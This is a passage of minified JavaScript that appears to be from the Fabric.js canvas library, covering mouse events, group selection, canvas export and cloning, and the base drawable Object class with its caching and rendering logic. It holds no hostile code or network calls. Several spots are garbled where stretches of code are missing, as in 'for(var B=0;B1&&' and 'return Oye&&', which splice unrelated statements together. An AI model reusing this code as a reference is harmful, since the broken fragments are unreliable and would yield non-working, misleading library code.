x=this;this._willAddMouseDown&&clearTimeout(this._willAddMouseDown),this._willAddMouseDown=setTimeout(function(){E(x.upperCanvasEl,w+"down",x._onMouseDown),x._willAddMouseDown=0},400)}},_onMouseUp:function(D){this.__onMouseUp(D),this._resetTransformEventData();var w=this.upperCanvasEl,x=this._getEventPrefix();this._isMainEvent(D)&&(C(j.document,x+"up",this._onMouseUp),C(j.document,x+"move",this._onMouseMove,A),E(w,x+"move",this._onMouseMove,A))},_onMouseMove:function(D){!this.allowTouchScrolling&&D.preventDefault&&D.preventDefault(),this.__onMouseMove(D)},_onResize:function(){this.calcOffset()},_shouldRender:function(D){var w=this._activeObject;return!!(!!w!=!!D||w&&D&&w!==D)},__onMouseUp:function(D){var w,x=this._currentTransform,S=this._groupSelector,O=!1,B=!S||0===S.left&&0===S.top;if(this._cacheTransformEventData(D),w=this._target,this._handleEvent(D,"up:before"),p(D,3))this.fireRightClick&&this._handleEvent(D,"up",3,B);else{if(p(D,2))return this.fireMiddleClick&&this._handleEvent(D,"up",2,B),void this._resetTransformEventData();if(this.isDrawingMode&&this._isCurrentlyDrawing)this._onMouseUpInDrawingMode(D);else if(this._isMainEvent(D)){if(x&&(this._finalizeCurrentTransform(D),O=x.actionPerformed),!B){var K=w===this._activeObject;this._maybeGroupObjects(D),O||(O=this._shouldRender(w)||!K&&w===this._activeObject)}var ee,se;if(w){if(ee=w._findTargetCorner(this.getPointer(D,!0),j.util.isTouchEvent(D)),w.selectable&&w!==this._activeObject&&"up"===w.activeOn)this.setActiveObject(w,D),O=!0;else{var ve=w.controls[ee],le=ve&&ve.getMouseUpHandler(D,w,ve);le&&le(D,x,(se=this.getPointer(D)).x,se.y)}w.isMoving=!1}if(x&&(x.target!==w||x.corner!==ee)){var ye=x.target&&x.target.controls[x.corner],z=ye&&ye.getMouseUpHandler(D,w,ve);se=se||this.getPointer(D),z&&z(D,x,se.x,se.y)}this._setCursorFromEvent(D,w),this._handleEvent(D,"up",1,B),this._groupSelector=null,this._currentTransform=null,w&&(w.__corner=0),O?this.requestRenderAll():B||this.renderTop()}}},_simpleEventHandler:function(D,w){var x=this.findTarget(w),S=this.targets,O={e:w,target:x,subTargets:S};if(this.fire(D,O),x&&x.fire(D,O),!S)return x;for(var B=0;B1&&(y=new j.ActiveSelection(_.reverse(),{canvas:this}),this.setActiveObject(y,b))},_collectObjects:function(b){for(var y,_=[],A=this._groupSelector.ex,p=this._groupSelector.ey,D=A+this._groupSelector.left,w=p+this._groupSelector.top,x=new j.Point(E(A,D),E(p,w)),S=new j.Point(C(A,D),C(p,w)),O=!this.selectionFullyContained,B=A===D&&p===w,K=this._objects.length;K--&&!((y=this._objects[K])&&y.selectable&&y.visible&&(O&&y.intersectsWithRect(x,S,!0)||y.isContainedWithinRect(x,S,!0)||O&&y.containsPoint(x,null,!0)||O&&y.containsPoint(S,null,!0))&&(_.push(y),B)););return _.length>1&&(_=_.filter(function(ee){return!ee.onSelect({e:b})})),_},_maybeGroupObjects:function(b){this.selection&&this._groupSelector&&this._groupSelectedObjects(b),this.setCursor(this.defaultCursor),this._groupSelector=null}})}(),j.util.object.extend(j.StaticCanvas.prototype,{toDataURL:function(E){E||(E={});var C=E.format||"png",b=E.quality||1,_=(E.multiplier||1)*(E.enableRetinaScaling?this.getRetinaScaling():1),y=this.toCanvasElement(_,E);return j.util.toDataURL(y,C,b)},toCanvasElement:function(E,C){var b=((C=C||{}).width||this.width)*(E=E||1),_=(C.height||this.height)*E,y=this.getZoom(),A=this.width,p=this.height,D=y*E,w=this.viewportTransform,O=this.interactive,B=[D,0,0,D,(w[4]-(C.left||0))*E,(w[5]-(C.top||0))*E],K=this.enableRetinaScaling,ee=j.util.createCanvasElement(),se=this.contextTop;return ee.width=b,ee.height=_,this.contextTop=null,this.enableRetinaScaling=!1,this.interactive=!1,this.viewportTransform=B,this.width=b,this.height=_,this.calcViewportBoundaries(),this.renderCanvas(ee.getContext("2d"),this._objects),this.viewportTransform=w,this.width=A,this.height=p,this.calcViewportBoundaries(),this.interactive=O,this.enableRetinaScaling=K,this.contextTop=se,ee}}),j.util.object.extend(j.StaticCanvas.prototype,{loadFromJSON:function(E,C,b){if(E){var _="string"==typeof E?JSON.parse(E):j.util.object.clone(E),y=this,A=_.clipPath,p=this.renderOnAddRemove;return this.renderOnAddRemove=!1,delete _.clipPath,this._enlivenObjects(_.objects,function(D){y.clear(),y._setBgOverlay(_,function(){A?y._enlivenObjects([A],function(w){y.clipPath=w[0],y.__setupCanvas.call(y,_,D,p,C)}):y.__setupCanvas.call(y,_,D,p,C)})},b),this}},__setupCanvas:function(E,C,b,_){var y=this;C.forEach(function(A,p){y.insertAt(A,p)}),this.renderOnAddRemove=b,delete E.objects,delete E.backgroundImage,delete E.overlayImage,delete E.background,delete E.overlay,this._setOptions(E),this.renderAll(),_&&_()},_setBgOverlay:function(E,C){var b={backgroundColor:!1,overlayColor:!1,backgroundImage:!1,overlayImage:!1};if(E.backgroundImage||E.overlayImage||E.background||E.overlay){var _=function(){b.backgroundImage&&b.overlayImage&&b.backgroundColor&&b.overlayColor&&C&&C()};this.__setBgOverlay("backgroundImage",E.backgroundImage,b,_),this.__setBgOverlay("overlayImage",E.overlayImage,b,_),this.__setBgOverlay("backgroundColor",E.background,b,_),this.__setBgOverlay("overlayColor",E.overlay,b,_)}else C&&C()},__setBgOverlay:function(E,C,b,_){var y=this;if(!C)return b[E]=!0,void(_&&_());"backgroundImage"===E||"overlayImage"===E?j.util.enlivenObjects([C],function(A){y[E]=A[0],b[E]=!0,_&&_()}):this["set"+j.util.string.capitalize(E,!0)](C,function(){b[E]=!0,_&&_()})},_enlivenObjects:function(E,C,b){E&&0!==E.length?j.util.enlivenObjects(E,function(_){C&&C(_)},null,b):C&&C([])},_toDataURL:function(E,C){this.clone(function(b){C(b.toDataURL(E))})},_toDataURLWithMultiplier:function(E,C,b){this.clone(function(_){b(_.toDataURLWithMultiplier(E,C))})},clone:function(E,C){var b=JSON.stringify(this.toJSON(C));this.cloneWithoutData(function(_){_.loadFromJSON(b,function(){E&&E(_)})})},cloneWithoutData:function(E){var C=j.util.createCanvasElement();C.width=this.width,C.height=this.height;var b=new j.Canvas(C);this.backgroundImage?(b.setBackgroundImage(this.backgroundImage.src,function(){b.renderAll(),E&&E(b)}),b.backgroundImageOpacity=this.backgroundImageOpacity,b.backgroundImageStretch=this.backgroundImageStretch):E&&E(b)}}),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.object.extend,_=C.util.object.clone,y=C.util.toFixed,A=C.util.string.capitalize,p=C.util.degreesToRadians;C.Object||(C.Object=C.util.createClass(C.CommonMethods,{type:"object",originX:"left",originY:"top",top:0,left:0,width:0,height:0,scaleX:1,scaleY:1,flipX:!1,flipY:!1,opacity:1,angle:0,skewX:0,skewY:0,cornerSize:13,touchCornerSize:24,transparentCorners:!0,hoverCursor:null,moveCursor:null,padding:0,borderColor:"rgb(178,204,255)",borderDashArray:null,cornerColor:"rgb(178,204,255)",cornerStrokeColor:null,cornerStyle:"rect",cornerDashArray:null,centeredScaling:!1,centeredRotation:!0,fill:"rgb(0,0,0)",fillRule:"nonzero",globalCompositeOperation:"source-over",backgroundColor:"",selectionBackgroundColor:"",stroke:null,strokeWidth:1,strokeDashArray:null,strokeDashOffset:0,strokeLineCap:"butt",strokeLineJoin:"miter",strokeMiterLimit:4,shadow:null,borderOpacityWhenMoving:.4,borderScaleFactor:1,minScaleLimit:0,selectable:!0,evented:!0,visible:!0,hasControls:!0,hasBorders:!0,perPixelTargetFind:!1,includeDefaultValues:!0,lockMovementX:!1,lockMovementY:!1,lockRotation:!1,lockScalingX:!1,lockScalingY:!1,lockSkewingX:!1,lockSkewingY:!1,lockScalingFlip:!1,excludeFromExport:!1,objectCaching:!C.isLikelyNode,statefullCache:!1,noScaleCache:!0,strokeUniform:!1,dirty:!0,__corner:0,paintFirst:"fill",activeOn:"down",stateProperties:"top left width height scaleX scaleY flipX flipY originX originY transformMatrix stroke strokeWidth strokeDashArray strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit angle opacity fill globalCompositeOperation shadow visible backgroundColor skewX skewY fillRule paintFirst clipPath strokeUniform".split(" "),cacheProperties:"fill stroke strokeWidth strokeDashArray width height paintFirst strokeUniform strokeLineCap strokeDashOffset strokeLineJoin strokeMiterLimit backgroundColor clipPath".split(" "),colorProperties:"fill stroke backgroundColor".split(" "),clipPath:void 0,inverted:!1,absolutePositioned:!1,initialize:function(x){x&&this.setOptions(x)},_createCacheCanvas:function(){this._cacheProperties={},this._cacheCanvas=C.util.createCanvasElement(),this._cacheContext=this._cacheCanvas.getContext("2d"),this._updateCacheCanvas(),this.dirty=!0},_limitCacheSize:function(x){var S=C.perfLimitSizeTotal,O=x.width,B=x.height,K=C.maxCacheSideLimit,ee=C.minCacheSideLimit;if(O<=K&&B<=K&&O*B<=S)return Oye&&(x.zoomX/=O/ye,x.width=ye,x.capped=!0),B>z&&(x.zoomY/=B/z,x.height=z,x.capped=!0),x},_getCacheCanvasDimensions:function(){var x=this.getTotalObjectScaling(),S=this._getTransformedDimensions(0,0),O=S.x*x.scaleX/this.scaleX,B=S.y*x.scaleY/this.scaleY;return{width:O+2,height:B+2,zoomX:x.scaleX,zoomY:x.scaleY,x:O,y:B}},_updateCacheCanvas:function(){var x=this.canvas;if(this.noScaleCache&&x&&x._currentTransform){var O=x._currentTransform.action;if(this===x._currentTransform.target&&O.slice&&"scale"===O.slice(0,5))return!1}var le,ye,B=this._cacheCanvas,K=this._limitCacheSize(this._getCacheCanvasDimensions()),ee=C.minCacheSideLimit,se=K.width,ve=K.height,z=K.zoomX,l=K.zoomY,f=se!==this.cacheWidth||ve!==this.cacheHeight,M=f||this.zoomX!==z||this.zoomY!==l,P=0,G=0,X=!1;if(f){var L=this._cacheCanvas.width,h=this._cacheCanvas.height,R=se>L||ve>h;X=R||(se<.9*L||ve<.9*h)&&L>ee&&h>ee,R&&!K.capped&&(se>ee||ve>ee)&&(P=.1*se,G=.1*ve)}return this instanceof C.Text&&this.path&&(M=!0,X=!0,P+=this.getHeightOfLine(0)*this.zoomX,G+=this.getHeightOfLine(0)*this.zoomY),!!M&&(X?(B.width=Math.ceil(se+P),B.height=Math.ceil(ve+G)):(this._cacheContext.setTransform(1,0,0,1,0,0),this._cacheContext.clearRect(0,0,B.width,B.height)),le=K.x/2,ye=K.y/2,this.cacheTranslationX=Math.round(B.width/2-le)+le,this.cacheTranslationY=Math.round(B.height/2-ye)+ye,this.cacheWidth=se,this.cacheHeight=ve,this._cacheContext.translate(this.cacheTranslationX,this.cacheTranslationY),this._cacheContext.scale(z,l),this.zoomX=z,this.zoomY=l,!0)},setOptions:function(x){this._setOptions(x),this._initGradient(x.fill,"fill"),this._initGradient(x.stroke,"stroke"),this._initPattern(x.fill,"fill"),this._initPattern(x.stroke,"stroke")},transform:function(x){var O=this.calcTransformMatrix(!(this.group&&!this.group._transformDone||this.group&&this.canvas&&x===this.canvas.contextTop));x.transform(O[0],O[1],O[2],O[3],O[4],O[5])},toObject:function(x){var S=C.Object.NUM_FRACTION_DIGITS,O={type:this.type,version:C.version,originX:this.originX,originY:this.originY,left:y(this.left,S),top:y(this.top,S),width:y(this.width,S),height:y(this.height,S),fill:this.fill&&this.fill.toObject?this.fill.toObject():this.fill,stroke:this.stroke&&this.stroke.toObject?this.stroke.toObject():this.stroke,strokeWidth:y(this.strokeWidth,S),strokeDashArray:this.strokeDashArray?this.strokeDashArray.concat():this.strokeDashArray,strokeLineCap:this.strokeLineCap,strokeDashOffset:this.strokeDashOffset,strokeLineJoin:this.strokeLineJoin,strokeUniform:this.strokeUniform,strokeMiterLimit:y(this.strokeMiterLimit,S),scaleX:y(this.scaleX,S),scaleY:y(this.scaleY,S),angle:y(this.angle,S),flipX:this.flipX,flipY:this.flipY,opacity:y(this.opacity,S),shadow:this.shadow&&this.shadow.toObject?this.shadow.toObject():this.shadow,visible:this.visible,backgroundColor:this.backgroundColor,fillRule:this.fillRule,paintFirst:this.paintFirst,globalCompositeOperation:this.globalCompositeOperation,skewX:y(this.skewX,S),skewY:y(this.skewY,S)};return this.clipPath&&!this.clipPath.excludeFromExport&&(O.clipPath=this.clipPath.toObject(x),O.clipPath.inverted=this.clipPath.inverted,O.clipPath.absolutePositioned=this.clipPath.absolutePositioned),C.util.populateWithProperties(this,O,x),this.includeDefaultValues||(O=this._removeDefaultValues(O)),O},toDatalessObject:function(x){return this.toObject(x)},_removeDefaultValues:function(x){var S=C.util.getKlass(x.type).prototype;return S.stateProperties.forEach(function(B){"left"===B||"top"===B||(x[B]===S[B]&&delete x[B],Array.isArray(x[B])&&Array.isArray(S[B])&&0===x[B].length&&0===S[B].length&&delete x[B])}),x},toString:function(){return"#"},getObjectScaling:function(){if(!this.group)return{scaleX:this.scaleX,scaleY:this.scaleY};var x=C.util.qrDecompose(this.calcTransformMatrix());return{scaleX:Math.abs(x.scaleX),scaleY:Math.abs(x.scaleY)}},getTotalObjectScaling:function(){var x=this.getObjectScaling(),S=x.scaleX,O=x.scaleY;if(this.canvas){var B=this.canvas.getZoom(),K=this.canvas.getRetinaScaling();S*=B*K,O*=B*K}return{scaleX:S,scaleY:O}},getObjectOpacity:function(){var x=this.opacity;return this.group&&(x*=this.group.getObjectOpacity()),x},_set:function(x,S){var B=this[x]!==S,K=!1;return("scaleX"===x||"scaleY"===x)&&(S=this._constrainScale(S)),"scaleX"===x&&S<0?(this.flipX=!this.flipX,S*=-1):"scaleY"===x&&S<0?(this.flipY=!this.flipY,S*=-1):"shadow"!==x||!S||S instanceof C.Shadow?"dirty"===x&&this.group&&this.group.set("dirty",S):S=new C.Shadow(S),this[x]=S,B&&(K=this.group&&this.group.isOnACache(),this.cacheProperties.indexOf(x)>-1?(this.dirty=!0,K&&this.group.set("dirty",!0)):K&&this.stateProperties.indexOf(x)>-1&&this.group.set("dirty",!0)),this},setOnGroup:function(){},getViewportTransform:function(){return this.canvas&&this.canvas.viewportTransform?this.canvas.viewportTransform:C.iMatrix.concat()},isNotVisible:function(){return 0===this.opacity||!this.width&&!this.height&&0===this.strokeWidth||!this.visible},render:function(x){this.isNotVisible()||this.canvas&&this.canvas.skipOffscreen&&!this.group&&!this.isOnScreen()||(x.save(),this._setupCompositeOperation(x),this.drawSelectionBackground(x),this.transform(x),this._setOpacity(x),this._setShadow(x,this),this.shouldCache()?(this.renderCache(),this.drawCacheOnCanvas(x)):(this._removeCacheCanvas(),this.dirty=!1,this.drawObject(x),this.objectCaching&&this.statefullCache&&this.saveState({propertySet:"cacheProperties"})),x.restore())},renderCache:function(x){x=x||{},(!this._cacheCanvas||!this._cacheContext)&&this._createCacheCanvas(),this.isCacheDirty()&&(this.statefullCache&&this.saveState({propertySet:"cacheProperties"}),this.drawObject(this._cacheContext,x.forClipping),this.dirty=!1)},_removeCacheCanvas:function(){this._cacheCanvas=null,this._cacheContext=null,this.cacheWidth=0,this.cacheHeight=0},hasStroke:function(){return this.stroke&&"transparent"!==this.stroke&&0!==this.strokeWidth},hasFill:function(){return this.fill&&"transparent"!==this.fill},needsItsOwnCache:function(){return!!("stroke"===this.paintFirst&&this.hasFill()&&this.hasStroke()&&"object"==typeof this.shadow||this.clipPath)},shouldCache:function(){return this.ownCaching=this.needsItsOwnCache()||this.objectCaching&&(!this.group||!this.group.isOnACache()),this.ownCaching},willDrawShadow:function(){return!!this.shadow&&(0!==this.shadow.offsetX||0!==this.shadow.offsetY)},drawClipPathOnCache:function(x,S){if(x.save(),x.globalCompositeOperation=S.inverted?"destination-out":"destination-in",S.absolutePositioned){var O=C.util.invertTransform(this.calcTransformMatrix());x.transform(O[0],O[1],O[2],O[3],O[4],O[5])}S.transform(x),x.scale(1/S.zoomX,1/S.zoomY),x.drawImage(S._cacheCanvas,-S.cacheTranslationX,-S.cacheTranslationY),x.restore()},drawObject:function(x,S){var O=this.fill,B=this.stroke;S?(this.fill="black",this.stroke="",this._setClippingProperties(x)):this._renderBackground(x),this._render(x),this._drawClipPath(x,this.clipPath),this.fill=O,this.stroke=B},_drawClipPath:function(x,S){!S||(S.canvas=this.canvas,S.shouldCache(),S._transformDone=!0,S.renderCache({forClipping:!0}),this.drawClipPathOnCache(x,S))},drawCacheOnCanvas:function(x){x.scale(1/this.zoomX,1/this.zoomY),x.drawImage(this._cacheCanvas,-this.cacheTranslationX,-this.cacheTranslationY)},isCacheDirty:function(x){if(this.isNotVisible())return!1;if(this._cacheCanvas&&this._cacheContext&&!x&&this._updateCacheCanvas())return!0;if(this.dirty||this.clipPath&&this.clipPath.absolutePositioned||this.statefullCache&&this.hasStateChanged("cacheProperties")){if(this._cacheCanvas&&this._cacheContext&&!x){var S=this.cacheWidth/this.zoomX,O=this.cacheHeight/this.zoomY;this._cacheContext.clearRect(-S/2,-O/2,S,O)}return!0}return!1},_renderBackground:function(x){if(this.backgroundColor){var S=this._getNonTransformedDimensions();x.fillStyle=this.backgroundColor,x.fillRect(-S.x/2,-S.y/2,S.x,S.y),this._removeShadow(x)}},_setOpacity:function(x){this.group&&!this.group._transformDone?x.globalAlpha=this.getObjectOpacity():x.globalAlpha*=this.opacity},_setStrokeStyles:function(x,S){var O=S.stroke;O&&(x.lineWidth=S.strokeWidth,x.lineCap=S.strokeLineCap,x.lineDashOffset=S.strokeDashOffset,x.lineJoin=S.strokeLineJoin,x.miterLimit=S.strokeMiterLimit,O.toLive?"percentage"===O.gradientUnits||O.gradientTransform||O.patternTransform?this._applyPatternForTransformedGradient(x,O):(x.strokeStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,O)):x.strokeStyle=S.stroke)},_setFillStyles:function(x,S){var O=S.fill;O&&(O.toLive?(x.fillStyle=O.toLive(x,this),this._applyPatternGradientTransform(x,S.fill)):x.fillStyle=O)},_setClippingProperties:function(x){x.globalAlpha=1,x.strokeStyle="transparent",x.fillStyle="#000000"},_setLineDash:function(x,S){!S||0===S.length||(1&S.length&&S.push.apply(S,S),x.setLineDash(S))},_renderControls:function(x,S){var K,ee,se,O=this.getViewportTransform(),B=this.calcTransformMatrix();ee=void 0!==(S=S||{}).hasBorders?S.hasBorders:this.hasBorders,se=void 0!==S.hasControls?S.hasControls:this.hasControls,B=C.util.multiplyTransformMatrices(O,B),K=C.util.qrDecompose(B),x.save(),x.translate(K.translateX,K.translateY),x.lineWidth=1*this.borderScaleFactor,this.group||(x.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1),this.flipX&&(K.angle-=180),x.rotate(p(this.group?K.angle:this.angle)),S.forActiveSelection||this.group?ee&&this.drawBordersInGroup(x,K,S):ee&&this.drawBorders(x,S),se&&this.drawControls(x,S),x.restore()},_setShadow:function(x){if(this.shadow){var B,S=this.shadow,O=this.canvas,K=O&&O.viewportTransform[0]||1,ee=O&&O.viewportTransform[3]||1;B=S.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),O&&O._isRetinaScaling()&&(K*=C.devicePixelRatio,ee*=C.devicePixelRatio),x.shadowColor=S.color,x.shadowBlur=S.blur*C.browserShadowBlurConstant*(K+ee)*(B.scaleX+B.scaleY)/4,x.shadowOffsetX=S.offsetX*K*B.scaleX,x.shadowOffsetY=S.offsetY*ee*B.scaleY}},_removeShadow:function(x){!this.shadow||(x.shadowColor="",x.shadowBlur=x.shadowOffsetX=x.shadowOffsetY=0)},_applyPatternGradientTransform:function(x,S){if(!S||!S.toLive)return{offsetX:0,offsetY:0};var O=S.gradientTransform||S.patternTransform,B=-this.width/2+S.offsetX||0,K=-this.height/2+S.offsetY||0;return"percentage"===S.gradientUnits?x.transform(this.width,0,0,this.height,B,K):x.transform(1,0,0,1,B,K),O&&x.transform(O[0],O[1],O[2],O[3],O[4],O[5]),{offsetX:B,offsetY:K}},_renderPaintInOrder:function(x){"stroke"===this.paintFirst?(this._renderStroke(x),this._renderFill(x)):(this._renderFill(x),this._renderStroke(x))},_render:function(){},_renderFill:function(x){!this.fill||(x.save(),this._setFillStyles(x,this),"evenodd"===this.fillRule?x.fill("evenodd"):x.fill(),x.restore())},_renderStroke:function(x){if(this.stroke&&0!==this.strokeWidth){if(this.shadow&&!this.shadow.affectStroke&&this._removeShadow(x),x.save(),this.strokeUniform&&this.group){var S=this.getObjectScaling();x.scale(1/S.scaleX,1/S.scaleY)}else this.strokeUniform&&x.scale(1/this.scaleX,1/this.scaleY);this._setLineDash(x,this.strokeDashArray),this._setStrokeStyles(x,this),x.stroke(),x.restore()}},_applyPatternForTransformedGradient:function(x,S){var K,O=this._limitCacheSize(this._getCacheCanvasDimensions()),B=C.util.createCanvasElement(),ee=this.canvas.getRetinaScaling(),se=O.x/this.scaleX/ee,ve=O.y/this.scaleY/ee;B.width=se,B.height=ve,(K=B.getContext("2d")).beginPath(),K.moveTo(0,0),K.lineTo(se,0),K.lineTo(se,ve),K.lineTo(0,ve),K.closePath(),K.translate(se/2,ve/2),K.scale(O.zoomX/this.scaleX/ee,O.zoomY/this.scaleY/ee),this._applyPatternGradientTransform(K,S),K.fillStyle=S.toLive(x),K.fill(),x.translate(-this.width/2-this.strokeWidth/2,-this.height/2-this.strokeWidth/2),x.scale(ee*this.scaleX/O.zoomX,ee*this.scaleY/O.zoomY),x.strokeStyle=K.createPattern(B,"no-repeat")},_findCenterFromElement:function(){return{x:this.left+this.width/2,y:this.top+this.height/2}},_assignTransformMatrixProps:function(){if(this.transformMatrix){var x=C.util.qrDecompose(this.transformMatrix);this.flipX=!1,this.flipY=!1,this.set("scaleX",x.scaleX),this.set("scaleY",x.scaleY),this.angle=x.angle,this.skewX=x.skewX,this.skewY=0}},_removeTransformMatrix:function(x){var S=this._findCenterFromElement();this.transformMatrix&&(this._assignTransformMatrixProps(),S=C.util.transformPoint(S,this.transformMatrix)),this.transformMatrix=null,x&&(this.scaleX*=x.scaleX,this.scaleY*=x.scaleY,this.cropX=x.cropX,this.cropY=x.cropY,S.x+=x.offsetLeft,S.y+=x.offsetTop,this.width=x.width,this.height=x.height),this.setPositionByOrigin(S,"center","center")},clone:function(x,S){var O=this.toObject(S);this.constructor.fromObject?this.constructor.fromObject(O,x):C.Object._fromObject("Object",O,x)},cloneAsImage:function(x,S){var O=this.toCanvasElement(S);return x&&x(new C.Image(O)),this},toCanvasElement:function(x){x||(x={});var S=C.util,O=S.saveObjectTransform(this),B=this.group,K=this.shadow,ee=Math.abs,se=(x.multiplier||1)*(x.enableRetinaScaling?C.devicePixelRatio:1);delete this.group,x.withoutTransform&&S.resetObjectTransform(this),x.withoutShadow&&(this.shadow=null);var z,f,M,ve=C.util.createCanvasElement(),le=this.getBoundingRect(!0,!0),ye=this.shadow,l={x:0,y:0};ye&&(f=ye.blur,z=ye.nonScaling?{scaleX:1,scaleY:1}:this.getObjectScaling(),l.x=2*Math.round(ee(ye.offsetX)+f)*ee(z.scaleX),l.y=2*Math.round(ee(ye.offsetY)+f)*ee(z.scaleY)),M=le.height+l.y,ve.width=Math.ceil(le.width+l.x),ve.height=Math.ceil(M);var P=new C.StaticCanvas(ve,{enableRetinaScaling:!1,renderOnAddRemove:!1,skipOffscreen:!1});"jpeg"===x.format&&(P.backgroundColor="#fff"),this.setPositionByOrigin(new C.Point(P.width/2,P.height/2),"center","center");var G=this.canvas;P.add(this);var X=P.toCanvasElement(se||1,x);return this.shadow=K,this.set("canvas",G),B&&(this.group=B),this.set(O).setCoords(),P._objects=[],P.dispose(),P=null,X},toDataURL:function(x){return x||(x={}),C.util.toDataURL(this.toCanvasElement(x),x.format||"png",x.quality||1)},isType:function(x){return arguments.length>1?Array.from(arguments).includes(this.type):this.type===x},complexity:function(){return 1},toJSON:function(x){return this.toObject(x)},rotate:function(x){var S=("center"!==this.originX||"center"!==this.originY)&&this.centeredRotation;return S&&this._setOriginToCenter(),this.set("angle",x),S&&this._resetOrigin(),this},centerH:function(){return this.canvas&&this.canvas.centerObjectH(this),this},viewportCenterH:function(){return this.canvas&&this.canvas.viewportCenterObjectH(this),this},centerV:function(){return this.canvas&&this.canvas.centerObjectV(this),this},viewportCenterV:function(){return this.canvas&&this.canvas.viewportCenterObjectV(this),this},center:function(){return this.canvas&&this.canvas.centerObject(this),this},viewportCenter:function(){return this.canvas&&this.canvas.viewportCenterObject(this),this},getLocalPointer:function(x,S){S=S||this.canvas.getPointer(x);var O=new C.Point(S.x,S.y),B=this._getLeftTopCoords();return this.angle&&(O=C.util.rotatePoint(O,B,p(-this.angle))),{x:O.x-B.x,y:O.y-B.y}},_setupCompositeOperation:function(x){this.globalCompositeOperation&&(x.globalCompositeOperation=this.globalCompositeOperation)},dispose:function(){C.runningAnimations&&C.runningAnimations.cancelByTarget(this)}}),C.util.createAccessors&&C.util.createAccessors(C.Object),b(C.Object.prototype,C.Observable),C.Object.NUM_FRACTION_DIGITS=2,C.Object.ENLIVEN_PROPS=["clipPath"],C.Object._fromObject=function(x,S,O,B){var K=C[x];S=_(S,!0),C.util.enlivenPatterns([S.fill,S.stroke],function(ee){void 0!==ee[0]&&(S.fill=ee[0]),void 0!==ee[1]&&(S.stroke=ee[1]),C.util.enlivenObjectEnlivables(S,S,function(){var se=B?new K(S[B],S):new K(S);O&&O(se)})})},C.Object.__uid=0)}(we),function(){var E=j.util.degreesToRadians,C={left:-.5,center:0,right:.5},b={top:-.5,center:0,bottom:.5};j.util.object.extend(j.Object.prototype,{translateToGivenOrigin:function(_,y,A,p,D){var S,O,B,w=_.x,x=_.y;return"string"==typeof y?y=C[y]:y-=.5,"string"==typeof p?p=C[p]:p-=.5,"string"==typeof A?A=b[A]:A-=.5,"string"==typeof D?D=b[D]:D-=.5,O=D-A,((S=p-y)||O)&&(B=this._getTransformedDimensions(),w=_.x+S*B.x,x=_.y+O*B.y),new j.Point(w,x)},translateToCenterPoint:function(_,y,A){var p=this.translateToGivenOrigin(_,y,A,"center","center");return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},translateToOriginPoint:function(_,y,A){var p=this.translateToGivenOrigin(_,"center","center",y,A);return this.angle?j.util.rotatePoint(p,_,E(this.angle)):p},getCenterPoint:function(){var _=new j.Point(this.left,this.top);return this.translateToCenterPoint(_,this.originX,this.originY)},getPointByOrigin:function(_,y){var A=this.getCenterPoint();return this.translateToOriginPoint(A,_,y)},toLocalPoint:function(_,y,A){var D,w,p=this.getCenterPoint();return D=void 0!==y&&void 0!==A?this.translateToGivenOrigin(p,"center","center",y,A):new j.Point(this.left,this.top),w=new j.Point(_.x,_.y),this.angle&&(w=j.util.rotatePoint(w,p,-E(this.angle))),w.subtractEquals(D)},setPositionByOrigin:function(_,y,A){var p=this.translateToCenterPoint(_,y,A),D=this.translateToOriginPoint(p,this.originX,this.originY);this.set("left",D.x),this.set("top",D.y)},adjustPosition:function(_){var w,x,y=E(this.angle),A=this.getScaledWidth(),p=j.util.cos(y)*A,D=j.util.sin(y)*A;this.left+=p*((x="string"==typeof _?C[_]:_-.5)-(w="string"==typeof this.originX?C[this.originX]:this.originX-.5)),this.top+=D*(x-w),this.setCoords(),this.originX=_},_setOriginToCenter:function(){this._originalOriginX=this.originX,this._originalOriginY=this.originY;var _=this.getCenterPoint();this.originX="center",this.originY="center",this.left=_.x,this.top=_.y},_resetOrigin:function(){var _=this.translateToOriginPoint(this.getCenterPoint(),this._originalOriginX,this._originalOriginY);this.originX=this._originalOriginX,this.originY=this._originalOriginY,this.left=_.x,this.top=_.y,this._originalOriginX=null,this._originalOriginY=null},_getLeftTopCoords:function(){return this.translateToOriginPoint(this.getCenterPoint(),"left","top")}})}(),function(){var C=j.util,b=C.degreesToRadians,_=C.multiplyTransformMatrices,y=C.transformPoint;C.object.extend(j.Object.prototype,{oCoords:null,aCoords:null,lineCoords:null,ownMatrixCache:null,matrixCache:null,controls:{},_getCoords:function(A,p){return p?A?this.calcACoords():this.calcLineCoords():((!this.aCoords||!this.lineCoords)&&this.setCoords(!0),A?this.aCoords:this.lineCoords)},getCoords:function(A,p){return function E(A){return[new j.Point(A.tl.x,A.tl.y),new j.Point(A.tr.x,A.tr.y),new j.Point(A.br.x,A.br.y),new j.Point(A.bl.x,A.bl.y)]}(this._getCoords(A,p))},intersectsWithRect:function(A,p,D,w){var x=this.getCoords(D,w);return"Intersection"===j.Intersection.intersectPolygonRectangle(x,A,p).status},intersectsWithObject:function(A,p,D){return"Intersection"===j.Intersection.intersectPolygonPolygon(this.getCoords(p,D),A.getCoords(p,D)).status||A.isContainedWithinObject(this,p,D)||this.isContainedWithinObject(A,p,D)},isContainedWithinObject:function(A,p,D){for(var w=this.getCoords(p,D),S=0,O=A._getImageLines(p?A.aCoords:A.lineCoords);S<4;S++)if(!A.containsPoint(w[S],O))return!1;return!0},isContainedWithinRect:function(A,p,D,w){var x=this.getBoundingRect(D,w);return x.left>=A.x&&x.left+x.width<=p.x&&x.top>=A.y&&x.top+x.height<=p.y},containsPoint:function(A,S,D,w){var x=this._getCoords(D,w),O=(S=S||this._getImageLines(x),this._findCrossPoints(A,S));return 0!==O&&O%2==1},isOnScreen:function(A){if(!this.canvas)return!1;var p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!(!this.getCoords(!0,A).some(function(x){return x.x<=D.x&&x.x>=p.x&&x.y<=D.y&&x.y>=p.y})&&!this.intersectsWithRect(p,D,!0,A))||this._containsCenterOfCanvas(p,D,A)},_containsCenterOfCanvas:function(A,p,D){return!!this.containsPoint({x:(A.x+p.x)/2,y:(A.y+p.y)/2},null,!0,D)},isPartiallyOnScreen:function(A){if(!this.canvas)return!1;var 